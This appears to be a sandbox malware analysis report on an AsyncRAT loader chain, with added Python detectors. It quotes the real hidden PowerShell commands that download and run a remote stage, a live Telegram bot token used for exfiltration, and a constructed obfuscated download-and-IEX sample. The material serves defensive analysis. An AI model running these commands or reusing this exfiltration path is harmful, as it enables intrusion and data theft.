Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 | source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE | source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: ducksex.ddnsfree.com
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.8:49712 -> 178.208.169.197:6161
                      Source: global trafficHTTP traffic detected: GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1Host: almamas.com.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary=058ae0d9-f381-4383-b2eb-b7376aff61a3Host: api.telegram.orgContent-Length: 695695
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewASN Name: PHMGMT-AS1US PHMGMT-AS1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ipinfo.io
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 268Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.63 (48 connections listed)
Source: unknown; TCP traffic detected without corresponding DNS query: 23.206.229.226 (2 connections listed)
Source: global traffic; HTTP traffic detected: GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1 | Host: almamas.com.ly | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: almamas.com.ly
Source: global traffic; DNS traffic detected: DNS query: ipinfo.io
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: global traffic; DNS traffic detected: DNS query: ducksex.ddnsfree.com
Source: unknown; HTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: api.telegram.org | Content-Length: 268 | Connection: Keep-Alive
Source: powershell.exe, 00000013.00000002.1823355430.000002576D0D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000013.00000002.1753014941.00000257032C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257028C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1825667488.000002576EEE0000.00000004.08000000.00040000.00000000.sdmp; String found in binary or memory: http://localhost:3030/Service.asmx
Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot$BotToken/sendPhoto
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto
Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ipinfo.i
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ipinfo.io
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ipinfo.io/json
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ipinfo.io/missX
Source: powershell.exe, 00000004.00000002.1868900966.000002E7CC446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CB0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ipinfo.io/missingauth
Source: powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown; network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown; network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown; network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown; HTTPS traffic detected: 168.119.208.219:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
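The network entries above are the reporting half of this chain: the stager looks up the victim's public IP and location at ipinfo.io using the default user agent of Windows PowerShell 5.1's Invoke-WebRequest/Invoke-RestMethod (`WindowsPowerShell/5.1.19041.1682`), then posts a small JSON message (sendMessage, 268 bytes) and a large multipart upload (sendPhoto, 695,695 bytes) to the Telegram Bot API under a hard-coded bot token. The Python below is an added example and is not part of the Joe Sandbox report or of the malware: it parses request heads of this shape, extracts the numeric bot id from the token path (the part an analyst can quote in a takedown request without re-publishing the secret), and correlates the recon-plus-Telegram pattern. The sample requests are the report's own request lines rejoined with CRLF; the `RECON_HOSTS` set and the indicator names are my assumptions.

```python
"""Flag Telegram Bot API exfiltration and IP-geolocation recon in HTTP request logs.

Added example for this report, not Joe Sandbox code. The sample requests are
the HTTP request lines from the report, rejoined with CRLF as they would appear
on the wire; RECON_HOSTS and the indicator names are assumptions.
"""
import re
from typing import Any, Dict, List, Optional, Tuple

# Telegram bot tokens are "<numeric bot id>:<35-character secret>". The bot id
# alone identifies the bot to Telegram and is safe to put in a ticket.
TELEGRAM_TOKEN_RE = re.compile(
    r"^/bot(?P<bot_id>\d{8,10}):(?P<secret>[A-Za-z0-9_-]{35})/(?P<api_method>[A-Za-z]+)$"
)
# Assumption: IP-lookup services a stager typically calls before reporting in.
RECON_HOSTS = {"ipinfo.io", "api.ipify.org", "ifconfig.me", "icanhazip.com"}

# Constructed from the report's request lines (request line + headers, CRLF-joined).
SAMPLE_REQUESTS: List[str] = [
    "GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1\r\nHost: almamas.com.ly\r\nConnection: Keep-Alive\r\n",
    "GET /json HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\nHost: ipinfo.io\r\nConnection: Keep-Alive\r\n",
    "POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\nContent-Type: application/json\r\nHost: api.telegram.org\r\nContent-Length: 268\r\nConnection: Keep-Alive\r\n",
    "POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=058ae0d9-f381-4383-b2eb-b7376aff61a3\r\nHost: api.telegram.org\r\nContent-Length: 695695\r\n",
]


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request head into (method, path, headers); header names lower-cased."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for hdr in lines[1:]:
        if not hdr:
            continue
        name, _, value = hdr.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def analyse_request(raw: str) -> Optional[Dict[str, Any]]:
    """Return a finding for one request, or None if it matches nothing we care about."""
    _method, path, headers = parse_request(raw)
    host = headers.get("host", "")
    user_agent = headers.get("user-agent", "")
    body_bytes = int(headers.get("content-length", "0") or 0)
    if host == "api.telegram.org":
        token = TELEGRAM_TOKEN_RE.match(path)
        if token is None:
            return {"host": host, "reason": "telegram-api-no-token", "body_bytes": body_bytes}
        return {
            "host": host,
            "reason": "telegram-bot-exfil",
            "bot_id": token.group("bot_id"),          # never log group("secret")
            "api_method": token.group("api_method"),  # sendMessage / sendPhoto / sendDocument ...
            "body_bytes": body_bytes,
        }
    # Scripted IP lookups: the PowerShell default UA is a strong tell outside admin hosts.
    if host in RECON_HOSTS and "PowerShell" in user_agent:
        return {"host": host, "reason": "powershell-ip-recon", "body_bytes": body_bytes}
    return None


def triage(requests: List[str]) -> Dict[str, Any]:
    """Summarise a batch of requests from one host/session."""
    findings = [f for f in map(analyse_request, requests) if f is not None]
    reasons = {f["reason"] for f in findings}
    return {
        "findings": findings,
        "bot_ids": sorted({f["bot_id"] for f in findings if "bot_id" in f}),
        "bytes_to_telegram": sum(f["body_bytes"] for f in findings if f["host"] == "api.telegram.org"),
        # Both halves of the pattern seen in this report, in the same session.
        "recon_and_exfil": {"powershell-ip-recon", "telegram-bot-exfil"} <= reasons,
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_REQUESTS)
    for finding in summary["findings"]:
        print(finding)
    print("bot ids:", summary["bot_ids"], "bytes to Telegram:", summary["bytes_to_telegram"])
```

On a proxy or Zeek HTTP log the same logic applies per connection; the payload download from almamas.com.ly is deliberately not flagged here because nothing in that request line distinguishes it from a benign image fetch, which is exactly why the stager disguises its stage as a .jpg.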

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match; file source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR

                      System Summary

Source: Pe4905VGl1.bat, type: SAMPLE; matched rule: Detects powershell keyword obfuscated with carets, author: Florian Roth
Source: amsi64_2216.amsi.csv, type: OTHER; matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, author: ditekSHen
Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1, author: unknown
Source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTR; matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR; matched rule: Detects file containing reversed ASEP Autorun registry keys, author: ditekSHen
Source: C:\Windows\System32\wscript.exe; COM object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\cmd.exe; process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\wscript.exe; process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
Source: C:\Windows\System32\cmd.exe; process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
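The process-creation entries above record the launch chain: wscript.exe runs a .bat dropped in C:\Users\Public, which starts PowerShell with the execution policy bypassed and the window hidden, fetches the next stage through Microsoft.VisualBasic's CallByName (so 'DownloadString' appears only as a string argument, not as a method call, and the result is piped to IEX), and in a second launch hides the script path behind a `.replace('AMRKK','')` call that PowerShell evaluates before `&` runs the file. The Python below is an added example, not Joe Sandbox code: it normalises cmd.exe caret escapes and mixed-case binary names, scores the launch flags and loader idioms seen here, and reverses the `.replace` trick so the real script path can be collected for the host. The first two command lines are copied from the entries above; the third is constructed to exercise caret stripping (the .bat's own text is not reproduced on this page). The indicator names and the allowlist of conventional spellings are my choices.

```python
"""Triage PowerShell launch command lines like the ones recorded in this report.

Added example, not Joe Sandbox code. CMDLINES[0] and CMDLINES[1] are the
command-line portions of the report's process-creation entries; CMDLINES[2]
is constructed. Indicator names and CONVENTIONAL are assumptions.
"""
import re
from typing import Any, Dict, List

CMDLINES: List[str] = [
    # Copied from the report: reflective loader launch.
    r'''pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"''',
    # Copied from the report: script path hidden behind .replace().
    r'''PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"''',
    # Constructed: cmd.exe caret obfuscation of the kind SUSP_PowerShell_Caret_Obfuscation_2 flags.
    r'''cmd.exe /c p^o^w^e^r^s^h^e^l^l -e^p bypass -w hidden -c "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')"''',
]

# Each indicator is matched case-insensitively against the caret-stripped line.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "executionpolicy-bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "windowstyle-hidden": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "vb-callbyname-reflection": re.compile(r"Microsoft\.VisualBasic\.Interaction\]::CallByName", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "path-replace-obfuscation": re.compile(r"'[^']*'\.replace\('[^']+',\s*''\)", re.I),
}
# '<literal>'.replace('<junk>','') : capture both so the literal can be reconstructed.
PATH_REPLACE_RE = re.compile(r"'([^']*)'\.replace\('([^']+)',\s*''\)", re.I)
# Spellings of the binary name that do not trip the case-anomaly check (assumption).
CONVENTIONAL = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}


def strip_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape for the next character and drops it.

    cmd does not honour carets inside double quotes, so this over-strips
    slightly; for detection that is the safe direction."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def recover_paths(cmdline: str) -> List[str]:
    """Apply each '<literal>'.replace('<junk>','') the way PowerShell would."""
    return [literal.replace(junk, "") for literal, junk in PATH_REPLACE_RE.findall(cmdline)]


def case_anomaly(cmdline: str) -> bool:
    """True if a token is 'powershell' ignoring case but spelled unconventionally."""
    for token in cmdline.split():
        base = token.rsplit("\\", 1)[-1]
        stem = base[:-4] if base.lower().endswith(".exe") else base
        if stem.lower() == "powershell" and stem not in CONVENTIONAL:
            return True
    return False


def triage(cmdline: str) -> Dict[str, Any]:
    """Score one recorded command line and recover any obfuscated script paths."""
    normalised = strip_carets(cmdline)
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(normalised)]
    if "^" in cmdline:
        hits.insert(0, "cmd-caret-obfuscation")
    if case_anomaly(normalised):
        hits.append("binary-name-case-anomaly")
    return {"indicators": hits, "recovered_paths": recover_paths(normalised), "score": len(hits)}


if __name__ == "__main__":
    for line in CMDLINES:
        result = triage(line)
        print(result["score"], result["indicators"], result["recovered_paths"])
```

The recovered path for the second entry is C:\Users\Public\LMKGJHPBNG.ps1, which is where the file to collect and hash actually lives; searching the host for the literal string in the command line would find nothing.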
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 4_2_00007FFB4B16DAF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 4_2_00007FFB4B16E8A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 4_2_00007FFB4B178B0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 4_2_00007FFB4B178B95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 4_2_00007FFB4B1631AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; code function: 19_2_00007FFB4B1625AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; code function: 21_2_00CCE508
Source: Pe4905VGl1.bat, type: SAMPLE; matched rule: SUSP_PowerShell_Caret_Obfuscation_2 (date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research)
Source: amsi64_2216.amsi.csv, type: OTHER; matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution)
